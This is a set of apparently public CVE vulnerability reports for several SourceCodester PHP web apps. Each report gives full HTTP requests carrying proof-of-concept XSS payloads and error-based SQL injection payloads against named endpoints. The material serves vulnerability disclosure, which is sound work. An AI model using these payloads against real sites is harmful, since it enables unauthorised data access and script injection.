Toll-tax-management-system v1.0 is vulnerable to Cross Site Scripting (XSS) via /ttms/classes/Master.php?f=save_recipient, vehicle_name.

Permalink

Cannot retrieve contributors at this time

**toll-tax-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ttms/classes/Master.php?f=save\_recipient

Vulnerability location: /ttms/classes/Master.php?f=save\_recipient, vehicle\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /ttms/classes/Master.php?f=save_recipient HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------24404946016694802869537324
    Content-Length: 870
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ttms/admin/?page=recipients/manage_recipient
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="category_id"
    
    2
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="toll_id"
    
    2
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="vehicle_name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="vehicle_registration"
    
    asd
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="owner"
    
    asd
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="cost"
    
    100
    -----------------------------24404946016694802869537324--

CVE-2022-30837: bug_report_CVE/xss.md at main · mikeccltt/bug_report_CVE

Simple Social Networking Site v1.0 is vulnerable to Cross Site Scripting (XSS) via /sns/classes/Users.php?f=save, firstname.

Permalink

Cannot retrieve contributors at this time

**simple-social-networking-site-instagram v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15311/simple-social-networking-site-instagram-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /sns/classes/Users.php?f=save

Vulnerability location: /sns/classes/Users.php?f=save, firstname

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /sns/classes/Users.php?f=save HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------2778781845921125101691173168
    Content-Length: 1036
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/sns/admin/?page=user/manage_user
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="firstname"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="middlename"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="lastname"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="username"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="password"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="type"
    
    2
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------2778781845921125101691173168--

CVE-2022-30460: sns_bug_report/xss.md at main · mikeccltt/sns_bug_report

Water-billing-management-system v1.0 is affected by: Cross Site Scripting (XSS) via /wbms/classes/Users.php?f=save, firstname.

Permalink

Cannot retrieve contributors at this time

**water-billing-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15309/water-billing-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /wbms/classes/Users.php?f=save

Vulnerability location: /wbms/classes/Users.php?f=save, firstname

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /wbms/classes/Users.php?f=save HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------41385014663807018218740876870
    Content-Length: 1045
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/wbms/admin/?page=user/manage_user
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="firstname"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="middlename"
    
    123
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="lastname"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="username"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="password"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="type"
    
    1
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------41385014663807018218740876870--

CVE-2022-30462: wbms_bug_report/xss.md at main · mikeccltt/wbms_bug_report

Automotive Shop Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /asms/classes/Master.php?f=save_product, name.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /asms/classes/Master.php?f=save\_product

Vulnerability location: /asms/classes/Master.php?f=save\_product, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /asms/classes/Master.php?f=save_product HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------83960212638164850273547100712
    Content-Length: 835
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/asms/admin/?page=products
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="id"
    
    5
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="description"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="price"
    
    1100.00
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------83960212638164850273547100712--

CVE-2022-30458: automotive/xss.md at main · mikeccltt/automotive

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /asms/classes/Master.php?f=delete\_product

Vulnerability location: /asms/classes/Master.php?f=delete\_product, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /asms/classes/Master.php?f=delete_product HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/asms/admin/?page=products
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30463: automotive/sql.md at main · mikeccltt/automotive

ChatBot App with Suggestion in PHP/OOP v1.0 is vulnerable to SQL Injection via /simple_chat_bot/classes/Master.php?f=delete_response, id.

Permalink

**chatbot-app-suggestion-phpoop v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /simple\_chat\_bot/classes/Master.php?f=delete\_response

Vulnerability location: /simple\_chat\_bot/classes/Master.php?f=delete\_response, id

\[+\] Payload: id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /simple_chat_bot/classes/Master.php?f=delete_response HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/simple_chat_bot/admin/?page=responses
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30459: chatbot/sql.md at main · mikeccltt/chatbot

Water-billing-management-system v1.0 is vulnerable to SQL Injection via /wbms/classes/Master.php?f=delete_client, id

Permalink

**water-billing-management-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15309/water-billing-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /wbms/classes/Master.php?f=delete\_client

Vulnerability location: /wbms/classes/Master.php?f=delete\_client, id

\[+\] Payload:id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /wbms/classes/Master.php?f=delete_client HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/wbms/admin/?page=clients
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30461: wbms_bug_report/sql.md at main · mikeccltt/wbms_bug_report

Badminton Center Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via /bcms/classes/Master.php?f=save_court_rental.

Permalink

Cannot retrieve contributors at this time

**badminton-center-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Date: 2022-05-06

Vulnerability File: /bcms/classes/Master.php?f=save\_court\_rental

Vulnerability location: /bcms/classes/Master.php?f=save\_court\_rental, client\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /bcms/classes/Master.php?f=save_court_rental HTTP/1.1
    Host: bcms.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------176722279832480832321731227058
    Content-Length: 1164
    Origin: http://bcms.com
    Connection: keep-alive
    Referer: http://bcms.com/bcms/admin/?page=court_rentals/manage_court_rental&id=5
    Cookie: PHPSESSID=bruvaommkrfrt7tjj2m3mr8ui0
    
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="id"
    
    5
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="client_name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="contact"
    
    15115111511
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="court_id"
    
    3
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="court_price"
    
    450.00
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="datetime_start"
    
    0222-02-22T22:22
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="hours"
    
    22.00
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="datetime_end"
    
    
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="total"
    
    9900.00
    -----------------------------176722279832480832321731227058--

CVE-2022-30456: badminton-center-management-system/badminton-center-management-system-xss.md at main · mikeccltt/badminton-center-management-system

Badminton Center Management System 1.0 is vulnerable to SQL Injection via /bcms/classes/Master.php?f=delete_court_rental, id.

**badminton-center-management-system has SQL injection vulnerability **

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Date: 2022-05-06

Vulnerability File: /bcms/classes/Master.php?f=delete\_court\_rental

Vulnerability location: /bcms/classes/Master.php?f=delete\_court\_rental, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /bcms/classes/Master.php?f=delete_court_rental HTTP/1.1
    Host: bcms.com
    Proxy-Connection: keep-alive
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://bcms.com
    Referer: http://bcms.com/bcms/admin/?page=court_rentals
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=4gth9auqof3f53e4gedjm3dct2
    
    id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30455: badminton-center-management-system/badminton-center-management-system.md at main · mikeccltt/badminton-center-management-system

Merchandise Online Store 1.0 is vulnerable to SQL Injection via /vloggers_merch/classes/Master.php?f=delete_product.

Permalink

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/classes/Master.php?f=delete\_product

Vulnerability location: /vloggers\_merch/classes/Master.php?f=delete\_product, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /vloggers\_merch/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/vloggers\_merch/admin/?page=product
Content-Length: 65
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tag

#php